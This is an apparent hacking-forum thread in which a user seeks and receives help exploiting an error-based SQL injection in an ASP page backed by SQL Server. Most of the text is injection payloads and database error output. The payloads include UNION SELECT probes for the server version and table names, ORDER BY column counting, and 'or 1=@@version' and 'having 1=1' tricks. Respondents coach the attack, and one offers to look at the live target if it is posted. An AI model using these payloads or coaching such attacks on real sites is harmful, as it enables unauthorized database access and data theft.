Yo dudes!

I'm trying to exploit a SQL Injection is in a field in ASP with SQL Server - error based SQL Injection.

Some informations that may be helpful...


UNION%20 ALL%20 SELECT%20 CAST(@@version %20AS %20int) %20--

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'CVP' to data type int.

/include/lang.asp, line 19


UNION%20 ALL%20 SELECT%20 CAST(@@version %20AS %20text) %20--


Microsoft OLE DB Provider for SQL Server error '80040e14'

All queries combined using a UNION, INTERSECT or EXCEPT operator must
have an equal number of expressions in their target lists.

/include/lang.asp, line 26


UNION %20SELECT %20TOP %201 %20CAST(TABLE_NAME %20 AS %20 ntext)
%20FROM %20INFORMATION_SCHEMA.TABLES--


Microsoft OLE DB Provider for SQL Server error '80040e14'

The ntext data type cannot be selected as DISTINCT because it is not comparable.

/include/lang.asp, line 29


UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version) %20--

Microsoft OLE DB Provider for SQL Server error '80040e14'

All queries combined using a UNION, INTERSECT or EXCEPT operator must
have an equal number of expressions in their target lists.

/include/lang.asp, line 13

As you can see, the injections are not working, and I can't understand why. Can someone give me a hint?

Thank you

Refer to http://sla.ckers.org/forum/read.php?16,31832,31838#msg-31838 and follow the steps.
Just be sure to replace the error message in step 1 with your own.
(All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists).

Once completed, remember to pat yourself on the shoulder for being self-sufficient.

YO lightos

Looks like a good suggestion, however I did it and couldn't solve the problem.

Can you please translate to me what they mean by "operator must have an equal number of expressions in their target lists"?

At first I was thinking it could be different number of columns, but I tried...

UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version),NULL %20--
UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version),NULL,NULL %20--
UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version),NULL,NULL,NULL %20--
UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version),NULL,NULL,NULL,NULL %20--

And so on and I always get the same error.

Can you please give me a more specific hint?

thank you

You can figure out the # of columns used in the query using order by:

lang.asp?=eng' order by 1--
lang.asp?=eng' order by 2--
lang.asp?=eng' order by 3--

Keep going up until you get an error message.

You could also probably determine the version through error messages, try:
lang.asp?=eng' or 1=@@version--

Yo lightos

Thanks for your help.

I think this SQL Injection is really strange.

See...

Injecting:

lang.asp?=1' order by 1--

Result in:

Unclosed quotation mark after the character string ' order by 1--'.

I make me think that there is a problem with quotes or double quotes...

If I inject:

lang.asp?=1%20 order %20 by %20 1--

Result in:

Microsoft OLE DB Provider for SQL Server error '80040e14'

The text, ntext, and image data types cannot be compared or sorted, except when using IS NULL or LIKE operator.

If I inject other numbers in order by, like:

lang.asp?=1%20 order %20 by %20 2--
lang.asp?=1%20 order %20 by %20 3--
lang.asp?=1%20 order %20 by %20 4--

Microsoft OLE DB Provider for SQL Server error '80040e14'

The ORDER BY position number X is out of range of the number of items in the select list.

So, I believe the correct number of columns should be 1, right? But at the same time, it doesn't make sense, else the my first query should work, not?

My first query: UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version) %20--

Also, I tried the following:

lang.asp?=1%20 order %20 by %20 '1'--

And it resulted in this strange behavior:

Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "1 order by '1'--"]'

/include/hdl.inc, line 109

Strange, ahn?

Ah, If I try:

' %20or %201=@@version%20--
%20or %201=@@version%20--

It always result in:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'or'.

Do you really think the problem is related with number of columns?

Thanks.



Edited 1 time(s). Last edit at 10/15/2009 02:57PM by rickm.

Might be passing through two queries, first one has only 1 column, second one has more.
Someone had this problem a couple of days ago http://sla.ckers.org/forum/read.php?16,31532,31835.

about this error :

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'or'.

it's BLIND . so you have to do BSQL injection , if you like post the target here so me and others can take a look !

try having 1=1--
or ' having 1=1--

Thanks for the answers.